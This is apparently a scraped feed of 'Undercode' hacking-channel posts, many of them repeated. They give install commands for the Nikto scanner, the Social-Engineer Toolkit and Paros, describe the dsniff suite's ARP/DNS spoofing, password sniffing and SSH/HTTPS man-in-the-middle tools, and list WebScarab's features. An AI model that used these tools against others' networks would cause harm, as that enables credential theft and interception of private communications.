> git sources▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 updated web server scanner :
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣git clone https://github.com/sullo/nikto
# Main script is in program/
2️⃣cd nikto/program
# Run using the shebang interpreter
3️⃣./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4️⃣perl nikto.pl -h http://www.example.com
🦑Run as a Docker container:
1️⃣git clone https://github.com/sullo/nikto.git
2️⃣cd nikto
3️⃣docker build -t sullo/nikto .
# Call it without arguments to display the full help
4️⃣docker run --rm sullo/nikto
# Basic usage
5️⃣docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6️⃣docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 updated web server scanner :
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣git clone https://github.com/sullo/nikto
# Main script is in program/
2️⃣cd nikto/program
# Run using the shebang interpreter
3️⃣./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4️⃣perl nikto.pl -h http://www.example.com
🦑Run as a Docker container:
1️⃣git clone https://github.com/sullo/nikto.git
2️⃣cd nikto
3️⃣docker build -t sullo/nikto .
# Call it without arguments to display the full help
4️⃣docker run --rm sullo/nikto
# Basic usage
5️⃣docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6️⃣docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - sullo/nikto: Nikto web server scanner
Nikto web server scanner. Contribute to sullo/nikto development by creating an account on GitHub.
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
important hackers terms :
1️⃣arpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute 😄must be turned on ahead of time.
2️⃣dnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3️⃣dsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.
4️⃣ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).
5️⃣filesnarf
saves selected files sniffed from NFS traffic in the current
working directory.
6️⃣macof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.
7️⃣mailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).
8️⃣msgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9️⃣sshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.
🔟sshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.
1️⃣1️⃣tcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).
1️⃣2️⃣tcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally
ICMP source quench replies.
1️⃣3️⃣urlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).
1️⃣4️⃣webmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.
1️⃣5️⃣webspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
important hackers terms :
1️⃣arpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute 😄must be turned on ahead of time.
2️⃣dnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3️⃣dsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.
4️⃣ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).
5️⃣filesnarf
saves selected files sniffed from NFS traffic in the current
working directory.
6️⃣macof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.
7️⃣mailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).
8️⃣msgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9️⃣sshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.
🔟sshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.
1️⃣1️⃣tcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).
1️⃣2️⃣tcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally
ICMP source quench replies.
1️⃣3️⃣urlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).
1️⃣4️⃣webmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.
1️⃣5️⃣webspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Social-Engineer Toolkit 2020 updated :
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣
> Linux
>Mac OS X (experimental)
6️⃣Full usage see this pdf-if you beginer :
>
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Social-Engineer Toolkit 2020 updated :
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣
git clone https://github.com/trustedsec/social-engineer-
2️⃣toolkit/ setoolkit/
3️⃣cd setoolkit
4️⃣pip3 install -r requirements.txt
5️⃣python setup.py
🦑OS :> Linux
>Mac OS X (experimental)
6️⃣Full usage see this pdf-if you beginer :
>
https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑A Java based HTTP/HTTPS proxy
> for assessing web application vulnerability.
>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑A Java based HTTP/HTTPS proxy
> for assessing web application vulnerability.
>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
for Windows-Linux-Mac :@UndercodeTesting
> https://sourceforge.net/projects/paros/files/latest/download
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑What this ☠️ project can do in hacking ?
> Download :
>Fragments - extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins
>Proxy - observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.
> Manual intercept - allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.
>Beanshell - allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.
>Reveal hidden fields - sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.
Bandwidth simulator - allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.
>Spider - identifies new URLs on the target site, and fetches them on command.
>Manual request - Allows editing and replay of previous requests, or creation of entirely new requests.
SessionID analysis - collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.
>Scripted - operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.
>Parameter fuzzer - performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.
>Search - allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
Compare - calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is "the number of edits required to transform one document into another". For performance reasons, edits are calculated using word tokens, rather than byte by byte.
>SOAP - There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server. NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is
>Extensions - automates checks for files that were mistakenly left in web server's root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.
>XSS/CRLF - passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑What this ☠️ project can do in hacking ?
> Download :
https://wiki.owasp.org/index.php/Category:OWASP_WebScarab_Project
FEATURES :>Fragments - extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins
>Proxy - observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.
> Manual intercept - allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.
>Beanshell - allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.
>Reveal hidden fields - sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.
Bandwidth simulator - allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.
>Spider - identifies new URLs on the target site, and fetches them on command.
>Manual request - Allows editing and replay of previous requests, or creation of entirely new requests.
SessionID analysis - collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.
>Scripted - operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.
>Parameter fuzzer - performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.
>Search - allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
Compare - calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is "the number of edits required to transform one document into another". For performance reasons, edits are calculated using word tokens, rather than byte by byte.
>SOAP - There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server. NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is
>Extensions - automates checks for files that were mistakenly left in web server's root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.
>XSS/CRLF - passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁